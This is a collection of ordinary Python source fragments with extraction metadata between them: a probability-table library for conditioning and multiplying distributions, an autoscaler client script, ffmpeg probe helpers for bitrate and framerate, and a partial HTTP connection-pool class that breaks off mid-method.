def condition_on(self, *args, normalise=True):
"""Creates the conditional based on
the provided names of columns.
P(X, Y) -> P(X | Y) or P(Y | X)
Args:
args (list):
List of names of provided random
variables.
Raises:
ValueError:
If the provided RV names do not exist
in the distribution.
Returns:
MultiTable
"""
if self.columns.size == 1:
raise ValueError("This is a single column Table and cannot condition on.")
if len(args) == self.columns.size:
raise ValueError("Cannot condition on all columns.")
# split columns to indices and comp_indices
columns_info = self.columns.split_columns(*args)
# Convert the key:value to 2D numpy array
# the array rows are (rows, value)
arr = self.to_2d_array()
# divide the 2d array's rows to a tuple of columns,
# (row[indices]), compliment columns (row[comp_indices])
# and values row[-1]
arr_gen = (
(
RowKey(row[columns_info.indices]),
RowKey(row[columns_info.complimnet_indices]),
row[-1],
)
for row in arr
)
# Before calling the groupby, we have to sort the generator
# by the tuple of columns (index zero in itemgetter)
# And since later we will call the group by on group,
# for each key we do the inner sort too (index one in itemgetter)
sorted_arr = sorted(arr_gen, key=itemgetter(0, 1))
# This method convert a group to a dictionary
def make_dict(group):
# since the values in 'group' argument are
# (columns, compliment columns, value)
# here we group by 'compliment columns' and sum
# the values.
return {
k: sum([item[2] for item in g2])
for k, g2 in groupby(group, key=itemgetter(1))
}
# For each group (belongs a unique values), we create
# a dictionary in a dictionary comprehension
grouped_arr = {
k: make_dict(g) for k, g in groupby(sorted_arr, key=itemgetter(0))
}
# The above dictionary is dictionary of dictionaries
# # the first set of names is for parent dictionary
# and the second set is for children
table = MultiTable(
{
key: Table(values, columns_info.complimnet_names, _internal_=True)
for key, values in grouped_arr.items()
},
columns_info.indices_names,
)
if normalise:
table.normalise()
return table
def reduce(self, **kwargs):
"""Reduce the Table by one or more columns.
P(X, Y) -> P(X = x, Y) or P(X, Y = y)
Args:
kwargs (dict):
A dictionary that its 'key' is the name
of the column and its 'value'
is the value that must be reduced by.
Raises:
ValueError:
If the provided names do not exist in the Table.
Returns:
[Table]: A reduce Table.
"""
# split columns to indices and comp_indices
columns = list(kwargs.keys())
if len(columns) == self.columns.size:
raise ValueError("Cannot reduce on all column names.")
columns_info = self.columns.split_columns(*columns)
        values = np.array([value for _, value in kwargs.items()], dtype=object)
#
# Convert the key:values to 2D numpy array
# the array rows are (keys, value)
arr_counter = self.to_2d_array()
# filter the 2d array rows by provided values of the reduce
# conditioned_arr is a boolean one, and filtering happens
# in the second line
conditioned_arr = np.all(arr_counter[:, columns_info.indices] == values, axis=1)
sliced_arr = arr_counter[conditioned_arr, :]
# filter the 2d array columns (the compliment columns)
# plus the value column (which is the last column)
sliced_arr = sliced_arr[:, columns_info.complimnet_indices + [-1]]
# divide the 2d array's rows to a tuple of columns
# and value
# So, we make a generator that divide the rows to the tuple of
# columns (tuple(row[:-1]) and value (row[-1])
arr_gen = ((RowKey(row[:-1]), row[-1]) for row in sliced_arr)
# Before calling the groupby, we have to sort the generator
# by the tuple of column (index zero in itemgetter)
sorted_slice_arr = sorted(arr_gen, key=itemgetter(0))
# group by the filtered columns (compliment
# columns) and sum the value per key
# Note that the 'itemgetter' read the first index which
# is the tuple of compliment columns
return Table(
{
k: sum([item[1] for item in g])
for k, g in groupby(sorted_slice_arr, key=itemgetter(0))
},
columns_info.complimnet_names,
_internal_=True,
)
def get(self, *args, **kwargs):
key = self.columns.to_key(*args, **kwargs)
return super().__getitem__(key)
def to_table(self, sort=False, value_title=""):
arr = self.to_2d_array().astype("U")
arr_len = np.apply_along_axis(lambda row: [len(item) for item in row], 0, arr)
max_levels_len = np.max(arr_len[:, :-1], axis=0)
max_freq_len = max(np.max(arr_len[:, -1]), len(value_title))
def padding(max_len):
def str_padding(value):
return "".join([" "] * (max_len - len(str(value))))
return str_padding
r_padding = padding(max_freq_len)
if sort: # sort by values
items = reversed(sorted(self.items(), key=lambda item: item[1]))
else: # sort by keys
items = sorted(self.items())
rows = ""
header = ""
horizontal_line = ""
for i, name in enumerate(self.names):
header += f"|{name}{padding(max_levels_len[i])(name)}"
horizontal_line += "|" + "".join(["-"] * max_levels_len[i])
header += "|" + "".join([" "] * max_freq_len) + "|"
horizontal_line += "|" + "".join(["-"] * max_freq_len) + "|"
for k, value in items:
key_str = ""
for i, k_part in enumerate(k):
key_str += f"|{padding(max_levels_len[i])(k_part)}{k_part}"
freq_padding = r_padding(value)
rows += f"{key_str}|{value}{freq_padding}|\n"
return f"{header}\n{horizontal_line}\n{rows}"
def add(self, that):
"""Combines two FrequencyTable and return
a new one. All the frequencies are sum together.
This is not a mathematical sum.
"""
#############################################
# check the validity of operation based on column names
if not isinstance(that, Table):
raise ValueError("Table can only adds to Table.")
if self.columns.size != that.columns.size:
raise ValueError("Two adding Table do not have the same columns.")
if len(self.children_names) != len(that.children_names):
raise ValueError("Two adding Table do not have the same children columns.")
for i, name in enumerate(self.names):
if name != that.names[i]:
raise ValueError(
"Two adding Table do not have the same columns "
"(order must be the same too)."
)
for i, name in enumerate(self.children_names):
if name != that.children_names[i]:
raise ValueError(
"Two adding Table do not have the same children columns "
"(order must be the same too)."
)
#############################################
# Algorithm
#
def add_internal(this, that, names):
if that is not None:
for key in that.keys():
if key in this:
this[key] += that[key]
else:
this[key] = that[key]
return Table(this, names=names, _internal_=True)
############################################
# MultiTable handeling
if self.columns.is_multitable():
return Table(
{
k: add_internal(table.copy(), that[k], self.children_names)
for k, table in self.items()
},
self.names,
_internal_=True,
)
return add_internal(self.copy(), that, self.names)
def total(self):
if self.columns.is_multitable():
return {k: table.total() for k, table in self.items()}
return sum(self.values())
def normalise(self):
if self.columns.is_multitable():
for k, total in self.total().items():
if total == 0:
continue
table = self[k]
for k2 in table:
table[k2] /= total
else:
total = self.total()
if total != 0:
for k in self.keys():
self[k] /= total
def __mul__(self, right):
"""Multiplies a table with this one.
P(X, Y) * k -> P(X, Y)
P(X) * P(Y, Z) -> P(X, Y, Z)
Args:
right ([type]): [description]
Raises:
ValueError: [description]
Returns:
[type]: [description]
"""
if not isinstance(right, Table):
raise ValueError("The 'right' argument must be a 'Table'.")
(rows, names) = self._product_(right)
return Table(rows, names, _internal_=True)
def __rmul__(self, left):
"""Multiplies a table with this one.
k * P(X, Y) -> P(X, Y)
P(X) * P(Y, Z) -> P(X, Y, Z)
Args:
right ([type]): [description]
Raises:
ValueError: [description]
Returns:
[type]: [description]
"""
if not isinstance(left, Table):
raise ValueError("The 'right' argument must be a 'Table'.")
(rows, names) = left._product_(self)
return Table(rows, names, _internal_=True)
def __add__(self, right):
return self.add(right)
def prod_right(table, key2, value2):
    # Append key2 to every row key of the table and multiply every value by value2
if value2 is None:
return {}
return {key1 + key2: value1 * value2 for key1, value1 in table.items()}
def prod_left(table, key2, value2):
    # Prepend key2 to every row key of the table and multiply every value by value2
if value2 is None:
return {}
return {key2 + key1: value1 * value2 for key1, value1 in table.items()}
def multi_table_to_table_product(left, right, all_ordered_names):
"""Multiply two tables.
P(X, Y | Z) * P(Z) -> P(X, Y, Z)
P(X, Y | Z, W) * P(Z) -> P(X, Y, Z | W)
"""
# Case P(X, Y | Z) * P(Z) -> P(X, Y, Z)
if list(left.names) == list(right.names):
return Table(
ChainMap(
*[
prod_right(table, key2=k, value2=right[k])
for k, table in left.items()
]
),
left.columns.children_names + left.names,
_internal_=True,
)
# Case P(X, Y | Z, W) * P(Z) -> P(X, Y, Z | W)
for name in right.names:
        if name not in left.names:
            raise ValueError(
                f"Column name '{name}' in right table is not defined on "
                "conditioned columns of the left Table (name mismatched)."
            )
# e.g. P(X, Y | Z, W) * P(Z) : indices of [W]
indices = [i for i, name in enumerate(left.names) if name not in right.names]
# e.g. P(X, Y | Z, W) * P(Z) : indices of [Z]
compliment_indices = [i for i in range(left.columns.size) if i not in indices]
# e.g. P(X, Y | Z, W) * P(Z) : [W]
reduced_names = [left.names[i] for i in indices]
children_names = [
names for names in all_ordered_names if names not in reduced_names
]
def reduced_key(key):
# Method to split the keys
return {left.names[i]: key[i] for i in indices}
def compliment_key(key):
# Method to make a split key
return RowKey(*[key[i] for i in compliment_indices])
# Case: P(X, Y | Z, W) * P(Z) -> P(X, Y, Z | W)
if right.columns.size == len(indices):
return MultiTable(
ChainMap(
*[
prod_right(table, key2=k, value2=right[k])
for k, table in left.items()
]
),
reduced_names,
_children_names_=children_names,
)
return MultiTable(
{
compliment_key(k): table * right.reduce(**reduced_key(k))
for k, table in left.items()
},
reduced_names,
_children_names_=children_names,
)
def table_to_multi_table_product(left, right, all_ordered_names):
"""Multiply two tables.
P(Z) * P(X, Y | Z) -> P(Z, X, Y)
P(Z) * P(X, Y | Z, W) -> P(Z, X, Y | W)
"""
# Case P(Z) * P(X, Y | Z) -> P(Z, X, Y)
if list(left.names) == list(right.names):
return Table(
ChainMap(
*[
prod_left(table, key2=k, value2=left[k])
for k, table in right.items()
]
),
right.names + right.columns.children_names,
_internal_=True,
)
# Case P(Z) * P(X, Y | Z, W) -> P(Z, X, Y | W)
for name in left.names:
        if name not in right.names:
            raise ValueError(
                f"Column name '{name}' in left table is not defined on "
                "conditioned columns of the right Table (name mismatched)."
            )
# e.g. P(Z) * P(X, Y | Z, W) : indices of [W]
indices = [i for i, name in enumerate(right.names) if name not in left.names]
# e.g. P(Z) * P(X, Y | Z, W) : indices of [Z]
compliment_indices = [i for i in range(right.columns.size) if i not in indices]
# e.g. P(Z) * P(X, Y | Z, W) : [W]
reduced_names = [right.names[i] for i in indices]
children_names = [
names for names in all_ordered_names if names not in reduced_names
]
def reduced_key(key):
# Method to split the keys
return {right.names[i]: key[i] for i in indices}
def compliment_key(key):
# Method to make a split key
return RowKey(*[key[i] for i in compliment_indices])
# Case: P(Z) * P(X, Y | Z, W) -> P(Z, X, Y | W)
if left.columns.size == len(indices):
return MultiTable(
ChainMap(
*[
prod_left(table, key2=k, value2=left[k])
for k, table in right.items()
]
),
reduced_names,
_children_names_=children_names,
)
return MultiTable(
{
compliment_key(k): table * left.reduce(**reduced_key(k))
for k, table in right.items()
},
reduced_names,
_children_names_=children_names,
)
def multi_table_to_multi_table_product(table_main, table_side, all_ordered_names):
indices = [
i for i, name in enumerate(table_main.names) if name not in table_side.names
]
compliment_indices = [i for i in range(table_main.columns.size) if i not in indices]
reduced_names = [table_main.names[i] for i in compliment_indices]
children_names = [
names for names in all_ordered_names if names not in reduced_names
]
def reduced_key(key):
# Method to split the keys
return {table_main.names[i]: key[i] for i in indices}
def compliment_key(key):
# Method to split the keys
return RowKey(*[key[i] for i in compliment_indices])
if len(table_side.columns.children_names) == len(indices):
def prod2(key1, table1):
table_side_table2 = table_side[key1]
if table_side_table2 is None:
return {}
return {
compliment_key(key1): table1 * table2
                for key2, table2 in table_side_table2.items()
}
return MultiTable(
ChainMap(*[prod2(key1, table1) for key1, table1 in table_main.items()]),
reduced_names,
_children_names_=children_names,
)
return MultiTable(
{
compliment_key(key1): table1 * table2
for key1, table1 in table_main.items()
            for key2, table2 in table_side.reduce(**reduced_key(key1)).items()
},
reduced_names,
_children_names_=children_names,
)
def multi_table_product(left, right):
"""Multiply two tables.
P(X, Y | Z) * P(Z) -> P(X, Y , Z)
P(X, Y | Z, W) * P(Z) -> P(X, Y , Z | W)
P(X, Y | Z, U) * P(Z | U) -> P(X, Y , Z | U)
P(X, Y | Z, U, W) * P(Z | U, W) -> P(X, Y , Z | U, W)
in the case of two conditionals, the longer one defines
the order of variables
e.g.
P(X, Y | Z, U, W) * P(Z | W, U) -> P(X, Y , Z | U, W)
P(Z | W, U) * P(X, Y | Z, U, W) -> P(X, Y , Z | U, W)
Args:
left ([type]): [description]
right ([type]): [description]
Raises:
ValueError: [description]
Returns:
[type]: [description]
"""
# Cases:
# P(X, Y | Z) * P(Z) -> P(X, Y, Z)
# P(X, Y | Z, W) * P(Z) -> P(X, Y, Z | W)
if not isinstance(right, MultiTable):
if sorted(right.names) != sorted(left.names):
raise ValueError("The right names is" " not equal to conditionals of left.")
all_ordered_names = left.columns.children_names + right.columns.names
return multi_table_to_table_product(left, right, all_ordered_names)
# Cases:
# P(Z) * P(X, Y | Z) -> P(Z, X, Y)
# P(Z) * P(X, Y | Z, W) -> P(Z, X, Y | W)
if not isinstance(left, MultiTable):
if sorted(right.names) != sorted(left.names):
raise ValueError("The left names is" " not equal to conditionals of right.")
all_ordered_names = left.names + right.columns.children_names
return table_to_multi_table_product(left, right, all_ordered_names)
# Cases:
# P(X, Y | Z, U) * P(Z | U) -> P(X, Y, Z | U)
# P(X, Y | Z, U, W) * P(Z | U, W) -> P(X, Y, Z | U, W)
# P(X, Y, Z| U, W) * P(U | W) -> P(X, Y, Z, U | W
# P(X, Y, Z| U, V, W) * P(U, V | W) -> P(X, Y, Z, U, V | W)
def in_the_other(first, second):
for name in first:
if name not in second:
return False
return True
common_conditions = [name for name in left.names if name in right.names]
right_compliment_conditions = [
name for name in right.names if name not in common_conditions
]
left_compliment_conditions = [
name for name in left.names if name not in common_conditions
]
# To check the crossed cases
# e.g. P(X | Y) * P(Y | X)
# after removing common names on conditionals,
# one of them must remains conditionless
# e.g.
# 1) P(X, Y | Z, U) * P(Z | U)
# removes commons: P(X, Y | Z) * P(Z)
# 2) P(Z | U, W) * P(X, Y | Z, U, W)
# removes commons: P(Z) * P(X, Y | Z)
# 3) P(X | Y) * P(Y | X)
# remove commons fails
if len(right_compliment_conditions) == 0:
if not in_the_other(right.columns.children_names, left.names):
raise ValueError(
"Columns in right is not defined in conditional names of left."
)
all_ordered_names = left.columns.children_names + right.columns.children_names
return multi_table_to_multi_table_product(left, right, all_ordered_names)
elif len(left_compliment_conditions) == 0:
if not in_the_other(left.columns.children_names, right.names):
raise ValueError(
"Columns in left is not defined in conditional names of right."
)
all_ordered_names = left.columns.children_names + right.columns.children_names
return multi_table_to_multi_table_product(right, left, all_ordered_names)
else:
raise ValueError("Columns and conditional names mismatch.")
class MultiTable(Table):
def __init__(self, rows, names=None, _children_names_=None):
super().__init__(
rows, names, _internal_=True, _children_names_=_children_names_
)
def marginal(self, *args, normalise=True):
"""[summary]
P(X, Y | Z) -> P(X | Z) or P(Y | Z)
Args:
normalise (bool, optional): [description]. Defaults to True.
Raises:
ValueError: [description]
Returns:
MultiTable: [description]
"""
for name in args:
if name in self.names:
raise ValueError(f"Cannot marginalize on conditioned columns:'{name}'.")
table = Table(
{
k: table.marginal(*args, normalise=normalise)
for k, table in self.items()
},
self.names,
_internal_=True,
)
if normalise:
table.normalise()
return table
def condition_on(self, *args, normalise=True):
"""Creates the conditional based on
the provided names of columns.
P(X, Y | Z) -> P(X | Y, Z) or P(Y | X, Z)
Args:
args (list):
List of names of provided random
variables.
Raises:
ValueError:
If the provided RV names do not exist
in the distribution.
Returns:
(row, names)
"""
for name in args:
if name in self.names:
raise ValueError(f"Cannot condition on conditioned columns:'{name}'.")
conditioned_children = (
(k, table.condition_on(*args, normalise=normalise))
for k, table in self.items()
)
return MultiTable(
{
key2 + key1: table
for key1, key2_table in conditioned_children
for key2, table in key2_table.items()
},
# It results in: P(X, Y | Z) -> P(X | Y, Z)
# inversing the order turns it P(X, Y | Z) -> P(X | Z, Y)
# Maybe more controls is needed here
list(args) + self.names,
)
def reduce(self, **kwargs):
"""Reduce the Table by one or more columns.
P(X, Y | Z) -> P(X = x, Y | Z) or P(X, Y = y | Z)
Args:
kwargs (dict):
A dictionary that its 'key' is the name
of the column and its 'value'
is the value that must be reduced by.
Raises:
ValueError:
If the provided names do not exist in the Table.
Returns:
[Table]: A reduce Table.
"""
return MultiTable(
{k: table.reduce(**kwargs) for k, table in self.items()},
self.names,
)
def __mul__(self, right):
if not isinstance(right, Table):
raise ValueError("The 'right' argument must be a 'Table'.")
return multi_table_product(self, right)
def __rmul__(self, left):
if not isinstance(left, Table):
raise ValueError("The 'left' argument must be a 'Table'.")
return multi_table_product(left, self)
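# --- Hedged usage sketch (illustrative only; assumes the row keys behave like plain tuples) ---
# joint = Table({('rain', 'wet'): 0.30, ('rain', 'dry'): 0.10,
#                ('sun', 'wet'): 0.05, ('sun', 'dry'): 0.55},
#               names=['Weather', 'Grass'])
# p_weather = joint.marginal('Grass')               # sum out 'Grass' -> P(Weather)
# p_grass_given_w = joint.condition_on('Weather')   # MultiTable: P(Grass | Weather)
# p_joint_again = p_grass_given_w * p_weather       # back to the joint P(Grass, Weather)
# rainy_rows = joint.reduce(Weather='rain')         # rows with Weather='rain', projected onto 'Grass'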
| [
"probability.RowKey",
"numpy.max",
"operator.itemgetter",
"numpy.all",
"probability.TableColumns"
] | [((14467, 14529), 'numpy.all', 'np.all', (['(arr_counter[:, columns_info.indices] == values)'], {'axis': '(1)'}), '(arr_counter[:, columns_info.indices] == values, axis=1)\n', (14473, 14529), True, 'import numpy as np\n'), ((16044, 16075), 'numpy.max', 'np.max', (['arr_len[:, :-1]'], {'axis': '(0)'}), '(arr_len[:, :-1], axis=0)\n', (16050, 16075), True, 'import numpy as np\n'), ((23022, 23067), 'probability.RowKey', 'RowKey', (['*[key[i] for i in compliment_indices]'], {}), '(*[key[i] for i in compliment_indices])\n', (23028, 23067), False, 'from probability import RowKey\n'), ((25228, 25273), 'probability.RowKey', 'RowKey', (['*[key[i] for i in compliment_indices]'], {}), '(*[key[i] for i in compliment_indices])\n', (25234, 25273), False, 'from probability import RowKey\n'), ((26548, 26593), 'probability.RowKey', 'RowKey', (['*[key[i] for i in compliment_indices]'], {}), '(*[key[i] for i in compliment_indices])\n', (26554, 26593), False, 'from probability import RowKey\n'), ((2490, 2562), 'probability.TableColumns', 'TableColumns', ([], {'names': 'names', 'children_names': 'value_sample.names', 'table': 'self'}), '(names=names, children_names=value_sample.names, table=self)\n', (2502, 2562), False, 'from probability import TableColumns\n'), ((16104, 16126), 'numpy.max', 'np.max', (['arr_len[:, -1]'], {}), '(arr_len[:, -1])\n', (16110, 16126), True, 'import numpy as np\n'), ((2773, 2829), 'probability.TableColumns', 'TableColumns', ([], {'names': 'names', 'children_names': '[]', 'table': 'self'}), '(names=names, children_names=[], table=self)\n', (2785, 2829), False, 'from probability import TableColumns\n'), ((2934, 3004), 'probability.TableColumns', 'TableColumns', ([], {'names': 'names', 'children_names': '_children_names_', 'table': 'self'}), '(names=names, children_names=_children_names_, table=self)\n', (2946, 3004), False, 'from probability import TableColumns\n'), ((9663, 9679), 'probability.RowKey', 'RowKey', (['row[:-1]'], {}), '(row[:-1])\n', (9669, 9679), False, 'from probability import RowKey\n'), ((9896, 9909), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (9906, 9909), False, 'from operator import itemgetter\n'), ((11646, 11679), 'probability.RowKey', 'RowKey', (['row[columns_info.indices]'], {}), '(row[columns_info.indices])\n', (11652, 11679), False, 'from probability import RowKey\n'), ((11697, 11741), 'probability.RowKey', 'RowKey', (['row[columns_info.complimnet_indices]'], {}), '(row[columns_info.complimnet_indices])\n', (11703, 11741), False, 'from probability import RowKey\n'), ((12125, 12141), 'operator.itemgetter', 'itemgetter', (['(0)', '(1)'], {}), '(0, 1)\n', (12135, 12141), False, 'from operator import itemgetter\n'), ((15005, 15021), 'probability.RowKey', 'RowKey', (['row[:-1]'], {}), '(row[:-1])\n', (15011, 15021), False, 'from probability import RowKey\n'), ((15230, 15243), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (15240, 15243), False, 'from operator import itemgetter\n'), ((647, 672), 'operator.itemgetter', 'itemgetter', (['groupby_index'], {}), '(groupby_index)\n', (657, 672), False, 'from operator import itemgetter\n'), ((1300, 1356), 'probability.TableColumns', 'TableColumns', ([], {'names': 'names', 'children_names': '[]', 'table': 'self'}), '(names=names, children_names=[], table=self)\n', (1312, 1356), False, 'from probability import TableColumns\n'), ((1519, 1589), 'probability.TableColumns', 'TableColumns', ([], {'names': 'names', 'children_names': '_children_names_', 'table': 'self'}), '(names=names, 
children_names=_children_names_, table=self)\n', (1531, 1589), False, 'from probability import TableColumns\n'), ((1746, 1755), 'probability.RowKey', 'RowKey', (['k'], {}), '(k)\n', (1752, 1755), False, 'from probability import RowKey\n'), ((10313, 10326), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (10323, 10326), False, 'from operator import itemgetter\n'), ((12771, 12784), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (12781, 12784), False, 'from operator import itemgetter\n'), ((1870, 1879), 'probability.RowKey', 'RowKey', (['k'], {}), '(k)\n', (1876, 1879), False, 'from probability import RowKey\n'), ((12538, 12551), 'operator.itemgetter', 'itemgetter', (['(1)'], {}), '(1)\n', (12548, 12551), False, 'from operator import itemgetter\n'), ((15593, 15606), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (15603, 15606), False, 'from operator import itemgetter\n')] |
#!/usr/bin/env python
import argparse
from autoscaler.client.sender import send_request_data
def main():
parser = argparse.ArgumentParser(
description='Send a timestamp to the autoscaler listener'
)
parser.add_argument(
'--host',
type=str,
default='127.0.0.1',
help='autoscaler host'
)
parser.add_argument(
'--port',
type=int,
default=8740,
help='autoscaler port'
)
args = parser.parse_args()
send_request_data(args.host, args.port)
if __name__ == '__main__':
main()
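# Hedged usage note (the file name below is illustrative): invoked from the shell as, e.g.,
#   python client.py --host 10.0.0.5 --port 8740
# both flags are optional and default to 127.0.0.1:8740.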
| [
"autoscaler.client.sender.send_request_data",
"argparse.ArgumentParser"
] | [((121, 208), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Send a timestamp to the autoscaler listener"""'}), "(description=\n 'Send a timestamp to the autoscaler listener')\n", (144, 208), False, 'import argparse\n'), ((501, 540), 'autoscaler.client.sender.send_request_data', 'send_request_data', (['args.host', 'args.port'], {}), '(args.host, args.port)\n', (518, 540), False, 'from autoscaler.client.sender import send_request_data\n')] |
import math
from ffmpeg import probe
def get_bitrate(video_path):
bitrate = probe(video_path)['format']['bit_rate']
return f'{math.trunc(int(bitrate) / 1000)} kbit/s'
def get_framerate_fraction(video_path):
r_frame_rate = [stream for stream in probe(video_path)['streams']
if stream['codec_type'] == 'video'][0][
'r_frame_rate']
return r_frame_rate
def get_framerate_float(video_path):
numerator, denominator = get_framerate_fraction(video_path).split('/')
return round((int(numerator) / int(denominator)), 3)
def get_duration(video_path):
return probe(video_path)['format']['duration']
def get_mbit_str(megabits):
return f'{megabits} Mbps'
def get_pretty_codec_name(codec):
    names = {
        'h264': 'H.264 (AVC)',
        'hevc': 'H.265 (HEVC)'
    }
    return names.get(codec, codec)
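# --- Hedged usage sketch (assumes ffprobe is installed and 'clip.mp4' exists) ---
# print(get_bitrate('clip.mp4'))              # e.g. '4500 kbit/s'
# print(get_framerate_fraction('clip.mp4'))   # e.g. '30000/1001'
# print(get_framerate_float('clip.mp4'))      # e.g. 29.97
# print(get_duration('clip.mp4'))             # duration in seconds, as reported by ffprobe
# print(get_pretty_codec_name('hevc'))        # 'H.265 (HEVC)'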
| [
"ffmpeg.probe"
] | [((82, 99), 'ffmpeg.probe', 'probe', (['video_path'], {}), '(video_path)\n', (87, 99), False, 'from ffmpeg import probe\n'), ((611, 628), 'ffmpeg.probe', 'probe', (['video_path'], {}), '(video_path)\n', (616, 628), False, 'from ffmpeg import probe\n'), ((260, 277), 'ffmpeg.probe', 'probe', (['video_path'], {}), '(video_path)\n', (265, 277), False, 'from ffmpeg import probe\n')] |
import time;
try: # mDebugOutput use is Optional
from mDebugOutput import ShowDebugOutput, fShowDebugOutput;
except ModuleNotFoundError as oException:
if oException.args[0] != "No module named 'mDebugOutput'":
raise;
ShowDebugOutput = fShowDebugOutput = lambda x: x; # NOP
from mMultiThreading import cLock, cWithCallbacks;
from mNotProvided import *;
from .cHTTPConnection import cHTTPConnection;
from .mExceptions import *;
# To turn access to data store in multiple variables into a single transaction, we will create locks.
# These locks should only ever be locked for a short time; if it is locked for too long, it is considered a "deadlock"
# bug, where "too long" is defined by the following value:
gnDeadlockTimeoutInSeconds = 1; # We're not doing anything time consuming, so this should suffice.
gu0DefaultMaxNumberOfConnectionsToServer = 10;
class cHTTPConnectionsToServerPool(cWithCallbacks):
@ShowDebugOutput
def __init__(oSelf,
oServerBaseURL,
u0zMaxNumberOfConnectionsToServer = zNotProvided,
o0SSLContext = None
):
oSelf.__oServerBaseURL = oServerBaseURL;
oSelf.__u0MaxNumberOfConnectionsToServer = fxGetFirstProvidedValue(u0zMaxNumberOfConnectionsToServer, gu0DefaultMaxNumberOfConnectionsToServer);
oSelf.__o0SSLContext = o0SSLContext;
oSelf.__oConnectionsPropertyLock = cLock(
"%s.__oConnectionsPropertyLock" % oSelf.__class__.__name__,
n0DeadlockTimeoutInSeconds = gnDeadlockTimeoutInSeconds
);
oSelf.__aoConnections = []; # The connections this pool can use itself
oSelf.__aoExternalizedConnections = []; # The connections this pool has provided for use by others.
oSelf.__uPendingConnects = 0;
oSelf.__bStopping = False;
oSelf.__oTerminatedPropertyLock = cLock(
"%s.__oTerminatedEventFiredLock" % oSelf.__class__.__name__,
n0DeadlockTimeoutInSeconds = gnDeadlockTimeoutInSeconds
);
oSelf.__oTerminatedLock = cLock(
"%s.__oTerminatedLock" % oSelf.__class__.__name__,
bLocked = True
);
oSelf.fAddEvents(
"hostname resolved",
"connect failed",
"new connection",
"bytes written", "bytes read",
"request sent", "response received",
"request sent and response received",
"connection terminated",
"terminated"
);
@property
def bTerminated(oSelf):
return not oSelf.__oTerminatedLock.bLocked;
@property
def uConnectionsCount(oSelf):
return len(oSelf.__aoConnections) + len(oSelf.__aoExternalizedConnections);
# @property
# def aoConnections(oSelf):
# oSelf.__oConnectionsPropertyLock.fAcquire();
# try:
# return oSelf.__aoConnections[:];
# finally:
# oSelf.__oConnectionsPropertyLock.fRelease();
@ShowDebugOutput
def __fReportTerminatedIfNoMoreConnectionsExist(oSelf):
assert oSelf.__bStopping, \
"This functions should not be called if we are not stopping!";
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
if oSelf.__aoConnections or oSelf.__aoExternalizedConnections:
# There are existing connections; termination will be reported when
# they all terminate too.
return;
oSelf.__oTerminatedPropertyLock.fAcquire();
try:
if not oSelf.__oTerminatedLock.bLocked: return; # Already terminated
# Yes, we have terminated and must release the lock
# and fire events.
oSelf.__oTerminatedLock.fRelease();
finally:
oSelf.__oTerminatedPropertyLock.fRelease();
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
fShowDebugOutput("cHTTPConnectionsToServerPool terminated.");
oSelf.fFireCallbacks("terminated");
@ShowDebugOutput
def fStop(oSelf):
if oSelf.bTerminated:
return fShowDebugOutput("Already terminated");
if oSelf.__bStopping:
return fShowDebugOutput("Already stopping");
fShowDebugOutput("Stopping...");
oSelf.__bStopping = True;
# We are now officially stopping, so there should not be any new connections
# added from this point onward. If there are existing connections, we will
# stop them:
for oConnection in oSelf.__aoConnections[:]:
oConnection.fStop();
# If there are no connections and we have not terminated, do so now:
oSelf.__fReportTerminatedIfNoMoreConnectionsExist();
@ShowDebugOutput
def fTerminate(oSelf):
if oSelf.bTerminated:
return fShowDebugOutput("Already terminated");
fShowDebugOutput("Terminated...");
oSelf.__bStopping = True;
# We are now officially stopping, so there should not be any new connections
# added from this point onward. If there are existing connections, we will
# terminate them:
for oConnection in oSelf.__aoConnections[:]:
oConnection.fTerminate();
# If there are no connections and we have not terminated, do so now:
oSelf.__fReportTerminatedIfNoMoreConnectionsExist();
@ShowDebugOutput
def fbWait(oSelf, bTimeoutInSeconds):
return oSelf.__oTerminatedLock.fbWait(bTimeoutInSeconds);
def fo0GetConnectionAndStartTransaction(
oSelf,
n0zConnectTimeoutInSeconds = zNotProvided,
bSecure = True,
n0zSecureTimeoutInSeconds = zNotProvided,
n0zTransactionTimeoutInSeconds = zNotProvided,
):
# Wrapper for the internal version. This external version also marks the
# connection as having been passed externally, to prevent it from being
# used as part of the regular pool. The caller is responsible for closing
# the connection.
o0Connection = oSelf.__fo0GetConnectionAndStartTransaction(
n0zConnectTimeoutInSeconds,
bSecure,
n0zSecureTimeoutInSeconds,
n0zTransactionTimeoutInSeconds,
);
if o0Connection is None:
return None;
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
oSelf.__aoConnections.remove(o0Connection);
oSelf.__aoExternalizedConnections.append(o0Connection);
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
return o0Connection;
def __fo0GetConnectionAndStartTransaction(
oSelf,
n0zConnectTimeoutInSeconds,
bSecure,
n0zSecureTimeoutInSeconds,
n0zTransactionTimeoutInSeconds,
):
if oSelf.__bStopping:
return None;
fShowDebugOutput("Getting connection...");
if bSecure:
# Secure connections may already exist and can be reused:
o0Connection = oSelf.__fo0StartTransactionOnExistingConnection(n0zTransactionTimeoutInSeconds);
if o0Connection is not None:
return o0Connection;
if oSelf.__bStopping:
return None;
oConnection = oSelf.__foCreateNewConnectionAndStartTransaction(
n0zConnectTimeoutInSeconds,
bSecure,
n0zSecureTimeoutInSeconds,
n0zTransactionTimeoutInSeconds,
);
if oSelf.__bStopping:
return None;
assert oConnection, \
"A new connection was not established even though we are not stopping!?";
return oConnection;
@ShowDebugOutput
def fo0SendRequestAndReceiveResponse(oSelf,
oRequest,
n0zConnectTimeoutInSeconds = zNotProvided, n0zSecureTimeoutInSeconds = zNotProvided, n0zTransactionTimeoutInSeconds = zNotProvided,
bEndTransaction = True,
u0zMaxStatusLineSize = zNotProvided,
u0zMaxHeaderNameSize = zNotProvided, u0zMaxHeaderValueSize = zNotProvided, u0zMaxNumberOfHeaders = zNotProvided,
u0zMaxBodySize = zNotProvided, u0zMaxChunkSize = zNotProvided, u0zMaxNumberOfChunks = zNotProvided,
u0MaxNumberOfChunksBeforeDisconnecting = zNotProvided, # disconnect and return response once this many chunks are received.
):
# Send a request to the server and receive a response.
# An existing connection is reused if one is available. A new connection
    # is created if none is available and there are not too many connections.
# If not specified, always check the hostname when the connection is secure.
